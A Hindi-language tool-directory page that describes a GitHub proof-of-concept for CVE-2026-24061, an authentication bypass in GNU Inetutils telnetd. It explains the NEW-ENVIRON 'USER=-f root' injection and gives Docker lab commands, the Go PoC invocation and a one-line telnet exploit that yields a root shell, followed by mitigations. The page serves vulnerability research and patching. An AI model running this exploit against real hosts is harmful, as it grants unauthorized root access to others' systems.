Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24061 — GNU Inetutils telnetd प्रमाणीकरण बाईपास (CVE-2026-24061) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Docker लैब सेटअप और Go PoC के साथ। रूट शेल प्राप्त करने के लिए NEW-ENVIRON विकल्प का दोहन करता है। | Kitploit
उपकरण/GitHubGitHub/chocapikk/cve-2026-24061
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubchocapikk/cve-2026-24061

CVE-2026-24061

GNU Inetutils telnetd प्रमाणीकरण बाईपास (CVE-2026-24061) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Docker लैब सेटअप और Go PoC के साथ। रूट शेल प्राप्त करने के लिए NEW-ENVIRON विकल्प का दोहन करता है।

रिपॉजिटरी देखें
1237 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24061

GNU Inetutils telnetd रिमोट प्रमाणीकरण बायपास

सच में, 2026 में telnet? चलो यारो, अब आगे बढ़ने का समय आ गया है। SSH 1995 से मौजूद है। 🤦

विवरण

GNU Inetutils telnetd में एक गंभीर प्रमाणीकरण बायपास भेद्यता, जो संस्करण 1.9.3 से 2.7 को प्रभावित करती है।

यह भेद्यता login(1) में दुर्भावनापूर्ण तर्क इंजेक्ट करने के लिए NEW-ENVIRON telnet विकल्प का शोषण करती है। telnet प्रोटोकॉल के माध्यम से USER=-f root सेट करके, एक हमलावर बिना क्रेडेंशियल्स के प्रमाणीकरण को बायपास कर सकता है और root शेल प्राप्त कर सकता है।

प्रभावित संस्करण

  • GNU Inetutils 1.9.3 - 2.7

तकनीकी विवरण

telnet प्रोटोकॉल NEW-ENVIRON विकल्प (RFC 1572) का समर्थन करता है, जो क्लाइंट को सर्वर पर पर्यावरण चर भेजने की अनुमति देता है। telnetd डेमॉन USER चर को एक तर्क के रूप में login(1) को पास करता है।

USER=-f root भेजने पर, मान की व्याख्या इस प्रकार की जाती है:

  • -f फ़्लैग: प्रमाणीकरण छोड़ें (विश्वसनीय होस्ट)
  • root: लक्षित उपयोगकर्ता

इससे login -f root निष्पादित होता है, जो तत्काल root एक्सेस प्रदान करता है।

PoC IAC WILL ECHO (0xff 0xfb 0x01) की जाँच करके सफल शोषण का पता लगाता है - यह प्रोटोकॉल सिग्नल है जो शेल एक्सेस प्रदान होने पर सर्वर भेजता है।

लैब सेटअप

root@kitploit:~
# Build and run the vulnerable telnetd container
docker compose up --build -d

# Test the exploit
go run poc.go 127.0.0.1 2323

शोषण

root@kitploit:~
# Using the Go PoC (with interactive shell)
go run poc.go <target> <port>

# Simple PoC using standard telnet client
env USER='-f root' telnet -a <target> <port>

शमन

  • 2026 में telnet का उपयोग बंद करो, सच में 🙏
  • इसके बजाय SSH का उपयोग करें (यह अब 31 वर्षों से मौजूद है, मैं '95 में पैदा भी नहीं हुआ था lol)
  • GNU Inetutils के पैच किए गए संस्करण में अपग्रेड करें
  • फ़ायरवॉल नियमों के माध्यम से telnet एक्सेस प्रतिबंधित करें

फ़ाइलें

  • poc.go - इंटरैक्टिव शेल के साथ Go शोषण
  • Dockerfile - भेद्य telnetd कंटेनर
  • docker-compose.yml - लैब ऑर्केस्ट्रेशन

संदर्भ

  • परामर्श: https://www.openwall.com/lists/oss-security/2026/01/20/2
  • GNU Inetutils: https://www.gnu.org/software/inetutils/
  • RFC 1572 (NEW-ENVIRON): https://tools.ietf.org/html/rfc1572

श्रेय

  • LeakIX Research Team
टूल डाउनलोड करें